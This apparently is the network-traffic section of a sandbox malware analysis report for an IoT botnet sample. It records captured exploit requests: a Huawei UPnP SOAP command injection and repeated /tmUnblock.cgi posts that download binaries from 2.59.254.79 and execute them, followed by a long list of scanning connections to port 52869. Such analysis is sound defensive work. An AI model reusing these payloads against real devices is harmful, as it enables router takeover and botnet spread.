74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.138.179.77:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.182.78.77:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.206.252.44:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.75.30.79:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.15.223.53:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.246.161.10:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.248.118.224:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.216.181.148:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.254.121.209:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.115.242.154:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.188.255.157:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.154.126.132:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.16.42.23:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.133.147.179:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.89.4.30:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.106.40.166:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.113.61.14:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.235.202.9:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.36.90.142:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.25.34.22:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.101.158.88:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.193.14.54:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.190.246.18:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.219.49.188:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.100.17.13:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.113.114.221:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.165.96.129:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.118.91.153:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.58.45.121:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.225.231.175:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.57.144.169:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.86.121.73:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.113.42.15:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.133.83.66:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.134.207.73:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.2.230.219:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.94.0.15:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.212.12.64:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.40.121.104:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.229.200.167:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.182.62.79:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.197.70.129:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.90.41.88:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.217.121.28:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.153.11.64:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.172.168.32:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.61.149.153:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.142.133.149:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.142.27.127:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.204.255.137:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.73.52.29:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.153.145.211:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.85.120.193:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.30.51.3:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.34.16.163:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.251.33.72:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.126.144.55:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.121.255.64:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.153.95.190:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.39.122.53:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.132.21.92:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.244.125.142:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.71.185.237:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.196.39.119:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.76.180.139:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.234.138.119:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.110.83.227:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.160.50.53:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.27.66.224:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.215.190.206:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.41.89.214:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.242.169.204:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.176.249.16:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.249.33.99:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.214.95.108:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.189.113.62:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.34.110.64:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.162.159.189:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.45.246.7:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.90.197.213:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.108.8.85:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.49.230.52:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.159.39.85:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.33.223.213:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.93.2.128:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.166.151.119:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.235.24.111:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.207.129.15:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.80.241.202:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.59.104.13:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.98.250.158:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.248.109.196:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.84.150.170:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.88.230.171:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.111.31.24:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.92.203.235:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.136.251.124:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.6.32.107:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.61.176.131:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.236.6.166:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.107.179.99:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.149.155.210:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.101.181.162:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.100.131.12:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.8.150.165:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.111.0.139:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.139.178.67:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.187.12.101:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.164.239.26:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.216.141.135:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.16.182.132:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.75.58.153:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.235.217.153:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.216.179.87:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.252.128.81:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.161.244.127:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.100.158.165:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.30.208.188:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.193.16.127:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.204.85.132:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.227.215.179:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.32.158.118:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.163.161.86:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.35.148.80:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.187.76.136:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.252.220.46:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.129.212.58:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.55.15.32:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.99.155.81:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.154.73.233:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.62.131.218:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.116.233.68:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.100.54.177:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.189.88.45:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.15.71.124:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.164.142.200:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.198.83.200:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.225.46.241:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.190.128.110:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.215.214.123:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.2.236.13:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.230.53.172:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.93.33.233:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.59.8.74:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.185.56.195:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.128.220.49:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.128.49.41:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.11.29.250:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.230.189.113:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.104.160.250:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.5.139.93:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.25.44.215:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.238.0.75:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.76.203.104:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.2.12.94:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.236.36.112:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.38.86.138:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.0.9.29:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.237.149.204:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.30.65.33:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.198.194.4:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.185.186.139:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.80.219.94:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.195.57.243:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.250.96.244:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.16.132.252:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.102.28.68:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.202.77.131:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.164.17.151:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.55.109.168:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.117.50.211:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.55.88.39:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.228.81.73:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.59.20.13:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.81.107.156:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.86.47.114:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.33.123.136:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.72.215.37:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.147.68.93:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.72.239.240:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.18.23.86:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.178.70.56:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.151.92.44:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.255.250.167:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.77.51.111:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.93.153.211:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.132.229.122:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.73.188.136:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.209.170.59:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.127.233.86:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.214.215.129:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.9.64.27:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.122.232.105:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.175.252.142:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.193.111.7:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.99.214.2:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.141.148.52:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.213.84.29:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.245.133.139:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.35.9.96:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.115.20.152:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.40.119.92:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.250.31.228:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.96.171.39:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.218.96.239:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.27.60.140:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.60.182.90:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.92.171.139:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.20.137.184:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.44.70.151:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.255.153.170:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.112.209.153:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.213.106.44:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.0.11.5:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.159.240.97:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.30.164.85:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.204.131.223:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.49.40.32:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.74.202.176:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.110.44.38:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.222.209.196:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.149.44.68:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.75.246.68:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.146.184.91:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.97.236.228:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.4.53.194:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.232.164.76:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.89.66.242:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.135.255.236:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.103.79.242:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.100.65.126:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.249.126.16:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.141.208.0:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.172.102.136:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.53.185.111:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.202.85.28:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.102.203.118:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.41.36.58:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.136.189.42:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.28.147.130:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.217.240.42:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.232.29.50:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.161.83.32:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.6.220.32:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.164.38.85:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.236.44.166:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.30.189.55:52869 |
